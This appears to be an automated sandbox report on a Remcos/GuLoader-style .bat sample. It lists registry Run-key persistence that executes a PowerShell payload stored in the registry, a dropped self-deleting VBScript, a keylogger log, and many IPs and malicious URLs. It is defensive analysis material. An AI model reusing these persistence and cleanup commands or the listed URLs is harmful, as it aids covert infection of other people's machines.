                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .bat
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7344 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: ZW_PCCE-010023024001.bat
                                                                                                  TimeTypeDescription
                                                                                                  11:22:34API Interceptor88x Sleep call for process: powershell.exe modified
                                                                                                  11:23:48API Interceptor2967646x Sleep call for process: msiexec.exe modified
                                                                                                  16:23:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)
                                                                                                  16:23:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  178.237.33.50SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • geoplugin.net/json.gp
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  s-part-0017.t-0009.fb-t-msedge.netjuwXcVX5AK.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  qBtDOzhQnS.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  044SqLy1H3.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 13.107.253.45
                                                                                                  ufp4rvU3SP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  igCCUqSW2T.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  otq9AG1EIk.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  SecuriteInfo.com.Win32.Trojan.PSE.1S437JY.21210.19567.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  tfduJDS9iM.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.253.45
                                                                                                  https://1drv.ms/o/c/6c73e1f3356d6c81/EvfBo1LISVpEg8JGFA7u8GsBL0LmooIAfd5Q39ROhQ0Lhw?e=ZTugWVGet hashmaliciousHtmlDropperBrowse
                                                                                                  • 13.107.253.45
                                                                                                  roquette October.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 13.107.253.45
                                                                                                  geoplugin.netSecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  RCS-RDS73-75DrStaicoviciRO9wmt6bpcHr.elfGet hashmaliciousOkiruBrowse
                                                                                                  • 5.15.3.215
                                                                                                  byte.mips.elfGet hashmaliciousOkiruBrowse
                                                                                                  • 86.124.184.38
                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.18.69.62
                                                                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 79.115.119.253
                                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.196.115.42
                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.196.36.149
                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 79.116.71.85
                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 86.120.157.195
                                                                                                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 86.122.212.78
                                                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 79.114.177.248
                                                                                                  ATOM86-ASATOM86NLSecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 85.222.236.220
                                                                                                  DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  OBE-EUROPEObenetworkEuropeSEOrder_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 185.157.163.135
                                                                                                  Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.214
                                                                                                  SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.216
                                                                                                  SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.216
                                                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                  • 194.32.149.14
                                                                                                  bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 193.182.111.131
                                                                                                  z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                                                                  • 193.187.91.208
                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                  • 193.187.91.216
                                                                                                  https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 194.32.144.119
                                                                                                  REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                  • 193.187.91.208
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDistribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  PO 202410-224.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  http://docusign.netGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  https://c4hbh789.caspio.com/dp/32a4e0002a1934bee62047dd94d1Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  http://wxqlb.ecobusinessegypt.com/4Upeae17759oIun1207nsacmhsouq29959VLTMIPDLABHITRZ3224VGST20749x12Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  37f463bf4616ecd445d4a1937da06e19Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  rMactation.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 81.180.144.124
                                                                                                  rMactation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 81.180.144.124
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):288
                                                                                                  Entropy (8bit):3.3152173055146417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:6ljnOJ5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lqec0WFe5BWFe5BW+
                                                                                                  MD5:5DA37269356F939F2FF658D66922B5F9
                                                                                                  SHA1:8D316D80B78ADD00C76289F16654AAEA03C52C0F
                                                                                                  SHA-256:E34E9DF7E1C79ECA68114ED54F98C7FBA1A9CB28EF00E6DDC741EF90E9B1D3AA
                                                                                                  SHA-512:4B22824493AC3F5BC23AD0147A2422F309CCFB85FF0AEDEA61C5830A08DA096BE4D64DC3F6806B0F391BE327C544D68626F69763A9E970CF96E995D54B378223
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                  Preview:....[.2.0.2.4./.1.0./.2.3. .1.1.:.2.3.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):957
                                                                                                  Entropy (8bit):5.008511330476407
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qUdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:9PN0GX85mvhjTkvfEro
                                                                                                  MD5:F66BB44F7622D1FF3E1D39A1B07E9F0C
                                                                                                  SHA1:59E5ABCA56B357B9C763DB9CE156C48A35F54790
                                                                                                  SHA-256:303F9597E3F295F146B92E7BC578AEA455B4078750316164C5742CC950839885
                                                                                                  SHA-512:6731ADCC608C4D8A41F4ADDA445EAEC1744F73A70CF39D453737C96964FD2876423A99CAEF2B07926C2DD3AD8AA851550F0D4ABDBA34080C00F350C616C96873
                                                                                                  Malicious:false
                                                                                                  Preview:{. "geoplugin_request":"173.254.250.90",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):8003
                                                                                                  Entropy (8bit):4.840877972214509
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                  Malicious:false
                                                                                                  Preview:@...e................................................@..........
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5c23815b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16252928
                                                                                                  Entropy (8bit):0.9711871598931798
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:woTzQCo1CKGP5q/XiE9ENP//Xsx0BnNP//Xsx0Bn695nu8eX8e58ekpjX8ev8efw:Nh+NFrVo90FdLhVKsKanX9
                                                                                                  MD5:C377FDAFB53076A07200689E770FE45B
                                                                                                  SHA1:DC24DD0AA9483C1C33B7E01BEDA7F9E6855C3705
                                                                                                  SHA-256:C3F11C6A35BFE805841602CD1B6272AC4262996144EE354023DE934B81B4D475
                                                                                                  SHA-512:DF588F348805F6E0133FECB431A8B1AE89BAF52283CBB4CD57A568A256F878733DA7C186004F560853D402FB3C9E0ACEC3DA0BC070B2A0688DCB26206622AC56
                                                                                                  Malicious:false
                                                                                                  Preview:\#.[... .......4........X.2';...{k.......................k..........{.......|..h.m............................';...{-.............................................................................................S...........eJ......n........................................................................................................... ............{E..................................................................................................................................................................................................{E.................................. .".....|..................'`.......|...........................#......h.m.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview:..
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):322
                                                                                                  Entropy (8bit):3.41606619423634
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgU9n+SkyGkRkJ7jlAan9YKJRB4y0aGH:xQ4lA2++ugypjBQMB3D9+UcSY9Z/0ait
                                                                                                  MD5:53E961FCBE2540B967EFCB5E6C3FD316
                                                                                                  SHA1:252BBD1E644FF0124E2039EEDE8A955D5405A98C
                                                                                                  SHA-256:F9A970482BAA86264FAEF6C210212B65901857DB17241D5C176B6789EE620F42
                                                                                                  SHA-512:5BBF4FDCBBB403B7E963A91D43AA425EBAC5CFAF6E81E592162B9D4D071150C8327F89922F719C25A5CC378AA1E82E043E1F9FEDA4D78D6F3CDCA9F8CDC73700
                                                                                                  Malicious:true
                                                                                                  Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6220
                                                                                                  Entropy (8bit):3.7252698856668847
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:zBGAdQOCPU2bH39wwukvhkvklCyw9Npv+hnlUWESogZoRtpv+hnlKESogZol1:wmQOCMQNgkvhkvCCtDpWhnrHMpWhnAHK
                                                                                                  MD5:12D42DCF8C9B81A561D63F9C21FA422C
                                                                                                  SHA1:C1E2B4709B5C6B51A1DCD1F8E1E79AB042D73C47
                                                                                                  SHA-256:55BC4113C0EBB6CFDD38A98D9ACE49A12498CA662D8BCB6C329A966B0A904590
                                                                                                  SHA-512:166494D5B92EA8C4465202DFAF4A86902DAC76E3AD79343AB827EDFAEFB9B3749B21148E1D01ABEE07036539F73D878BCD5759A010FF82D05ACCF35AB312027D
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ....'GDj.....wa_%..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...p..\_%.....a_%......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGWY.z..........................=...A.p.p.D.a.t.a...B.V.1.....WY.z..Roaming.@......EWsGWY.z...........................B..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGWY.z..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGWY.z.........................."..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGWY.z....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGWY.z....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGWY.z................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6220
